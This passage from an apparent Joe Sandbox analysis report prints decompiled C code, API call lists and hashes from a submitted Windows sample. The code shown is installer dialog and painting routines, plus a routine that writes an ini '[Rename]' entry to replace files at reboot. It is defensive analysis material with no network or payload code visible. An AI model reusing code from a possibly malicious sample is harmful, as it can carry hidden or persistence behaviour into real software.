                                                  							}
                                                  							_t300 = _t300 + 1;
                                                  							_t319 =  &(_v32[0x818]);
                                                  							_v32 = _t319;
                                                  						} while (_t300 <  *0x434f2c);
                                                  						if(_v36 != 0) {
                                                  							L20:
                                                  							if(_v20 != 0) {
                                                  								E004044CE(_v8);
                                                  								goto L23;
                                                  							} else {
                                                  								ShowWindow(_v12, 5);
                                                  								E004044CE(_v12);
                                                  								L93:
                                                  								return E00404500(_a8, _a12, _a16);
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					}
                                                  				}
                                                  			}


























































                                                  0x00404f0d
                                                  0x00404f26
                                                  0x00404f2b
                                                  0x00404f33
                                                  0x00404f39
                                                  0x00404f4f
                                                  0x00404f52
                                                  0x0040517d
                                                  0x00405184
                                                  0x00405198
                                                  0x00405186
                                                  0x00405188
                                                  0x0040518b
                                                  0x0040518c
                                                  0x00405193
                                                  0x00405193
                                                  0x004051a4
                                                  0x004051b2
                                                  0x004051b5
                                                  0x004051cb
                                                  0x00405240
                                                  0x00405243
                                                  0x00405245
                                                  0x0040524f
                                                  0x0040525d
                                                  0x0040525d
                                                  0x0040525f
                                                  0x00405269
                                                  0x0040526f
                                                  0x00405272
                                                  0x00405275
                                                  0x00405290
                                                  0x00405277
                                                  0x00405281
                                                  0x00405281
                                                  0x00405275
                                                  0x00405269
                                                  0x00000000
                                                  0x00405243
                                                  0x004051d0
                                                  0x004051db
                                                  0x004051e0
                                                  0x004051e7
                                                  0x004051ec
                                                  0x004051f0
                                                  0x004051fb
                                                  0x004051fb
                                                  0x004051ff
                                                  0x00405203
                                                  0x00405207
                                                  0x0040521a
                                                  0x00405209
                                                  0x00405209
                                                  0x00405210
                                                  0x00405216
                                                  0x00405212
                                                  0x00405212
                                                  0x00405212
                                                  0x00405210
                                                  0x0040521e
                                                  0x00405220
                                                  0x00405233
                                                  0x00405236
                                                  0x00405239
                                                  0x00405239
                                                  0x00405203
                                                  0x00000000
                                                  0x004051f0
                                                  0x004051d2
                                                  0x004051d9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405293
                                                  0x00405293
                                                  0x0040529a
                                                  0x0040530b
                                                  0x00405313
                                                  0x0040531b
                                                  0x0040531b
                                                  0x00405324
                                                  0x00405326
                                                  0x0040532d
                                                  0x00405330
                                                  0x00405330
                                                  0x00405336
                                                  0x0040533d
                                                  0x00405340
                                                  0x00405340
                                                  0x00405346
                                                  0x0040534c
                                                  0x00405352
                                                  0x00405352
                                                  0x0040535f
                                                  0x004054c0
                                                  0x004054c7
                                                  0x004054e4
                                                  0x004054ea
                                                  0x004054fc
                                                  0x004054fc
                                                  0x00000000
                                                  0x00405365
                                                  0x00405367
                                                  0x0040536c
                                                  0x00405371
                                                  0x00405376
                                                  0x00405378
                                                  0x00405378
                                                  0x00405379
                                                  0x0040537a
                                                  0x0040537c
                                                  0x0040537c
                                                  0x00405384
                                                  0x004053c5
                                                  0x004053c7
                                                  0x004053d7
                                                  0x004053da
                                                  0x004053df
                                                  0x004053e6
                                                  0x004053e9
                                                  0x0040548b
                                                  0x00405494
                                                  0x0040549c
                                                  0x0040549c
                                                  0x004054aa
                                                  0x004054bb
                                                  0x004054bb
                                                  0x00000000
                                                  0x004054aa
                                                  0x004053ef
                                                  0x004053f2
                                                  0x004053f8
                                                  0x004053fd
                                                  0x004053ff
                                                  0x00405401
                                                  0x00405407
                                                  0x0040540e
                                                  0x00405413
                                                  0x0040541a
                                                  0x0040541d
                                                  0x0040541d
                                                  0x00405424
                                                  0x00405430
                                                  0x00405434
                                                  0x00405436
                                                  0x00405436
                                                  0x00405426
                                                  0x00405428
                                                  0x00405428
                                                  0x00405456
                                                  0x00405462
                                                  0x00405471
                                                  0x00405471
                                                  0x00405473
                                                  0x00405476
                                                  0x0040547f
                                                  0x00000000
                                                  0x00405386
                                                  0x00405391
                                                  0x00405394
                                                  0x00405399
                                                  0x0040539b
                                                  0x0040539f
                                                  0x004053af
                                                  0x004053b9
                                                  0x004053bb
                                                  0x004053be
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004053a1
                                                  0x004053a1
                                                  0x004053a7
                                                  0x004053a9
                                                  0x004053a9
                                                  0x004053aa
                                                  0x004053ab
                                                  0x00000000
                                                  0x004053a1
                                                  0x00405384
                                                  0x0040535f
                                                  0x004052a2
                                                  0x00000000
                                                  0x004052b8
                                                  0x004052c2
                                                  0x004052c7
                                                  0x00000000
                                                  0x00000000
                                                  0x004052d9
                                                  0x004052de
                                                  0x004052ea
                                                  0x004052ea
                                                  0x004052ec
                                                  0x004052fb
                                                  0x004052fd
                                                  0x00405301
                                                  0x00405304
                                                  0x00000000
                                                  0x00405304
                                                  0x004052a2
                                                  0x00404f58
                                                  0x00404f5d
                                                  0x00404f66
                                                  0x00404f6d
                                                  0x00404f7f
                                                  0x00404f8a
                                                  0x00404f90
                                                  0x00404f9e
                                                  0x00404fb2
                                                  0x00404fb7
                                                  0x00404fc4
                                                  0x00404fc9
                                                  0x00404fdf
                                                  0x00404ff0
                                                  0x00404ffd
                                                  0x00404ffd
                                                  0x00405000
                                                  0x00405006
                                                  0x00405008
                                                  0x0040500b
                                                  0x00405010
                                                  0x00405015
                                                  0x00405017
                                                  0x00405017
                                                  0x00405037
                                                  0x00405037
                                                  0x00405039
                                                  0x0040503a
                                                  0x0040503f
                                                  0x00405045
                                                  0x00405049
                                                  0x0040504e
                                                  0x00405056
                                                  0x0040505a
                                                  0x0040505f
                                                  0x00405064
                                                  0x0040506c
                                                  0x0040506f
                                                  0x0040513f
                                                  0x00405152
                                                  0x00000000
                                                  0x00405075
                                                  0x00405078
                                                  0x0040507b
                                                  0x0040507e
                                                  0x0040507e
                                                  0x00405084
                                                  0x0040508d
                                                  0x00405090
                                                  0x00405094
                                                  0x00405097
                                                  0x0040509a
                                                  0x004050a3
                                                  0x004050ac
                                                  0x004050af
                                                  0x004050b2
                                                  0x004050b5
                                                  0x004050f3
                                                  0x0040511e
                                                  0x004050f5
                                                  0x00405104
                                                  0x00405104
                                                  0x004050b7
                                                  0x004050ba
                                                  0x004050c8
                                                  0x004050d2
                                                  0x004050da
                                                  0x004050e1
                                                  0x004050ec
                                                  0x004050ec
                                                  0x004050b5
                                                  0x00405124
                                                  0x00405125
                                                  0x00405131
                                                  0x00405131
                                                  0x0040513d
                                                  0x00405158
                                                  0x0040515b
                                                  0x00405178
                                                  0x00000000
                                                  0x0040515d
                                                  0x00405162
                                                  0x0040516b
                                                  0x004054fe
                                                  0x00405510
                                                  0x00405510
                                                  0x0040515b
                                                  0x00000000
                                                  0x0040513d
                                                  0x0040506f

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404F1E
                                                  • GetDlgItem.USER32 ref: 00404F29
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                  • LoadImageW.USER32 ref: 00404F8A
                                                  • SetWindowLongW.USER32 ref: 00404FA3
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                  • DeleteObject.GDI32(00000000), ref: 00405000
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                  • SetWindowLongW.USER32 ref: 00405152
                                                  • ShowWindow.USER32(?,00000005), ref: 00405162
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                  • GlobalFree.KERNEL32 ref: 00405340
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                  • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                  • GetDlgItem.USER32 ref: 004054F5
                                                  • ShowWindow.USER32(00000000), ref: 004054FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                  • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                  • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                  • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                  				intOrPtr _v8;
                                                  				int _v12;
                                                  				void* _v16;
                                                  				struct HWND__* _t56;
                                                  				intOrPtr _t69;
                                                  				signed int _t75;
                                                  				signed short* _t76;
                                                  				signed short* _t78;
                                                  				long _t92;
                                                  				int _t103;
                                                  				signed int _t110;
                                                  				intOrPtr _t113;
                                                  				WCHAR* _t114;
                                                  				signed int* _t116;
                                                  				WCHAR* _t117;
                                                  				struct HWND__* _t118;
                                                  
                                                  				if(_a8 != 0x110) {
                                                  					if(_a8 != 0x111) {
                                                  						L13:
                                                  						if(_a8 != 0x4e) {
                                                  							if(_a8 == 0x40b) {
                                                  								 *0x42b234 =  *0x42b234 + 1;
                                                  							}
                                                  							L27:
                                                  							_t114 = _a16;
                                                  							L28:
                                                  							return E00404500(_a8, _a12, _t114);
                                                  						}
                                                  						_t56 = GetDlgItem(_a4, 0x3e8);
                                                  						_t114 = _a16;
                                                  						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                  							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                  							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                  							_v12 = _t103;
                                                  							_v16 = _t113;
                                                  							_v8 = 0x432ea0;
                                                  							if(_t103 - _t113 < 0x800) {
                                                  								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                  								SetCursor(LoadCursorW(0, 0x7f02));
                                                  								_push(1);
                                                  								E00404907(_a4, _v8);
                                                  								SetCursor(LoadCursorW(0, 0x7f00));
                                                  								_t114 = _a16;
                                                  							}
                                                  						}
                                                  						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                  							goto L28;
                                                  						} else {
                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                  								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                  							}
                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                  								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                  							}
                                                  							return 1;
                                                  						}
                                                  					}
                                                  					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                  						goto L27;
                                                  					} else {
                                                  						_t69 =  *0x42c240; // 0x7690e4
                                                  						_t29 = _t69 + 0x14; // 0x7690f8
                                                  						_t116 = _t29;
                                                  						if(( *_t116 & 0x00000020) == 0) {
                                                  							goto L27;
                                                  						}
                                                  						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                  						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                  						E004048E3();
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				_t117 = _a16;
                                                  				_t75 =  *(_t117 + 0x30);
                                                  				if(_t75 < 0) {
                                                  					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                                                  				}
                                                  				_t76 =  *0x434f38 + _t75 * 2;
                                                  				_t110 =  *_t76 & 0x0000ffff;
                                                  				_a8 = _t110;
                                                  				_t78 =  &(_t76[1]);
                                                  				_a16 = _t78;
                                                  				_v16 = _t78;
                                                  				_v12 = 0;
                                                  				_v8 = E00404609;
                                                  				if(_t110 != 2) {
                                                  					_v8 = E004045CF;
                                                  				}
                                                  				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                  				_push(0x22);
                                                  				E00404499(_a4);
                                                  				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                  				_push(0x23);
                                                  				E00404499(_a4);
                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                  				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                  				_t118 = GetDlgItem(_a4, 0x3e8);
                                                  				E004044CE(_t118);
                                                  				SendMessageW(_t118, 0x45b, 1, 0);
                                                  				_t92 =  *( *0x434f10 + 0x68);
                                                  				if(_t92 < 0) {
                                                  					_t92 = GetSysColor( ~_t92);
                                                  				}
                                                  				SendMessageW(_t118, 0x443, 0, _t92);
                                                  				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                  				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                  				 *0x42b234 = 0;
                                                  				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                  				 *0x42b234 = 0;
                                                  				return 0;
                                                  			}



















                                                  0x0040466a
                                                  0x00404797
                                                  0x004047f4
                                                  0x004047f8
                                                  0x004048c5
                                                  0x004048c7
                                                  0x004048c7
                                                  0x004048cd
                                                  0x004048cd
                                                  0x004048d0
                                                  0x00000000
                                                  0x004048d7
                                                  0x00404806
                                                  0x0040480c
                                                  0x00404816
                                                  0x00404821
                                                  0x00404824
                                                  0x00404827
                                                  0x00404832
                                                  0x00404835
                                                  0x0040483c
                                                  0x00404849
                                                  0x0040485a
                                                  0x00404860
                                                  0x00404868
                                                  0x00404876
                                                  0x0040487c
                                                  0x0040487c
                                                  0x0040483c
                                                  0x00404886
                                                  0x00000000
                                                  0x00404891
                                                  0x00404895
                                                  0x004048a5
                                                  0x004048a5
                                                  0x004048ab
                                                  0x004048b7
                                                  0x004048b7
                                                  0x00000000
                                                  0x004048bb
                                                  0x00404886
                                                  0x004047a2
                                                  0x00000000
                                                  0x004047b4
                                                  0x004047b4
                                                  0x004047b9
                                                  0x004047b9
                                                  0x004047bf
                                                  0x00000000
                                                  0x00000000
                                                  0x004047e8
                                                  0x004047ea
                                                  0x004047ef
                                                  0x00000000
                                                  0x004047ef
                                                  0x004047a2
                                                  0x00404670
                                                  0x00404673
                                                  0x00404678
                                                  0x00404689
                                                  0x00404689
                                                  0x00404691
                                                  0x00404694
                                                  0x00404698
                                                  0x0040469b
                                                  0x0040469f
                                                  0x004046a2
                                                  0x004046a5
                                                  0x004046a8
                                                  0x004046af
                                                  0x004046b1
                                                  0x004046b1
                                                  0x004046bb
                                                  0x004046c8
                                                  0x004046d2
                                                  0x004046d7
                                                  0x004046da
                                                  0x004046df
                                                  0x004046f6
                                                  0x004046fd
                                                  0x00404710
                                                  0x00404713
                                                  0x00404727
                                                  0x0040472e
                                                  0x00404733
                                                  0x00404738
                                                  0x00404738
                                                  0x00404746
                                                  0x00404754
                                                  0x00404766
                                                  0x0040476b
                                                  0x0040477b
                                                  0x0040477d
                                                  0x00000000

                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                  • GetDlgItem.USER32 ref: 0040470A
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                  • GetSysColor.USER32(?), ref: 00404738
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                  • lstrlenW.KERNEL32(?), ref: 00404759
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                  • GetDlgItem.USER32 ref: 004047D4
                                                  • SendMessageW.USER32(00000000), ref: 004047DB
                                                  • GetDlgItem.USER32 ref: 00404806
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                  • SetCursor.USER32(00000000), ref: 0040485A
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                  • SetCursor.USER32(00000000), ref: 00404876
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N
                                                  • API String ID: 3103080414-3438112850
                                                  • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                  • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                  • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                  • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				struct tagRECT _v32;
                                                  				struct tagPAINTSTRUCT _v96;
                                                  				struct HDC__* _t70;
                                                  				struct HBRUSH__* _t87;
                                                  				struct HFONT__* _t94;
                                                  				long _t102;
                                                  				signed int _t126;
                                                  				struct HDC__* _t128;
                                                  				intOrPtr _t130;
                                                  
                                                  				if(_a8 == 0xf) {
                                                  					_t130 =  *0x434f10;
                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                  					_a8 = _t70;
                                                  					GetClientRect(_a4,  &_v32);
                                                  					_t126 = _v32.bottom;
                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                  					while(_v32.top < _t126) {
                                                  						_a12 = _t126 - _v32.top;
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                  						_v32.bottom = _v32.bottom + 4;
                                                  						_a16 = _t87;
                                                  						FillRect(_a8,  &_v32, _t87);
                                                  						DeleteObject(_a16);
                                                  						_v32.top = _v32.top + 4;
                                                  					}
                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                  						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                  						_a16 = _t94;
                                                  						if(_t94 != 0) {
                                                  							_t128 = _a8;
                                                  							_v32.left = 0x10;
                                                  							_v32.top = 8;
                                                  							SetBkMode(_t128, 1);
                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                  							_a8 = SelectObject(_t128, _a16);
                                                  							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                  							SelectObject(_t128, _a8);
                                                  							DeleteObject(_a16);
                                                  						}
                                                  					}
                                                  					EndPaint(_a4,  &_v96);
                                                  					return 0;
                                                  				}
                                                  				_t102 = _a16;
                                                  				if(_a8 == 0x46) {
                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                  				}
                                                  				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                  			}













                                                  0x0040100a
                                                  0x00401039
                                                  0x00401047
                                                  0x0040104d
                                                  0x00401051
                                                  0x0040105b
                                                  0x00401061
                                                  0x00401064
                                                  0x004010f3
                                                  0x00401089
                                                  0x0040108c
                                                  0x004010a6
                                                  0x004010bd
                                                  0x004010cc
                                                  0x004010cf
                                                  0x004010d5
                                                  0x004010d9
                                                  0x004010e4
                                                  0x004010ed
                                                  0x004010ef
                                                  0x004010ef
                                                  0x00401100
                                                  0x00401105
                                                  0x0040110d
                                                  0x00401110
                                                  0x00401112
                                                  0x00401118
                                                  0x0040111f
                                                  0x00401126
                                                  0x00401130
                                                  0x00401142
                                                  0x00401156
                                                  0x00401160
                                                  0x00401165
                                                  0x00401165
                                                  0x00401110
                                                  0x0040116e
                                                  0x00000000
                                                  0x00401178
                                                  0x00401010
                                                  0x00401013
                                                  0x00401015
                                                  0x0040101f
                                                  0x0040101f
                                                  0x00000000

                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32 ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                  • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                  • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                  • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406183(void* __ecx) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				long _t12;
                                                  				long _t24;
                                                  				char* _t31;
                                                  				int _t37;
                                                  				void* _t38;
                                                  				intOrPtr* _t39;
                                                  				long _t42;
                                                  				WCHAR* _t44;
                                                  				void* _t46;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t52;
                                                  				void* _t53;
                                                  
                                                  				_t38 = __ecx;
                                                  				_t44 =  *(_t52 + 0x14);
                                                  				 *0x430908 = 0x55004e;
                                                  				 *0x43090c = 0x4c;
                                                  				if(_t44 == 0) {
                                                  					L3:
                                                  					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                  						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                  						_t53 = _t52 + 0x10;
                                                  						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                  						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                  						_t48 = _t12;
                                                  						 *(_t53 + 0x18) = _t48;
                                                  						if(_t48 != 0xffffffff) {
                                                  							_t42 = GetFileSize(_t48, 0);
                                                  							_t6 = _t37 + 0xa; // 0xa
                                                  							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                  							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                  								L18:
                                                  								return CloseHandle(_t48);
                                                  							} else {
                                                  								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                  									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                  									if(_t49 == 0) {
                                                  										_t48 =  *(_t53 + 0x18);
                                                  										L16:
                                                  										_t24 = _t42;
                                                  										L17:
                                                  										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                  										SetFilePointer(_t48, 0, 0, 0);
                                                  										E004060DF(_t48, _t46, _t42 + _t37);
                                                  										GlobalFree(_t46);
                                                  										goto L18;
                                                  									}
                                                  									_t39 = _t46 + _t42;
                                                  									_t31 = _t39 + _t37;
                                                  									while(_t39 > _t49) {
                                                  										 *_t31 =  *_t39;
                                                  										_t31 = _t31 - 1;
                                                  										_t39 = _t39 - 1;
                                                  									}
                                                  									_t24 = _t49 - _t46 + 1;
                                                  									_t48 =  *(_t53 + 0x18);
                                                  									goto L17;
                                                  								}
                                                  								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                  								_t42 = _t42 + 0xa;
                                                  								goto L16;
                                                  							}
                                                  						}
                                                  					}
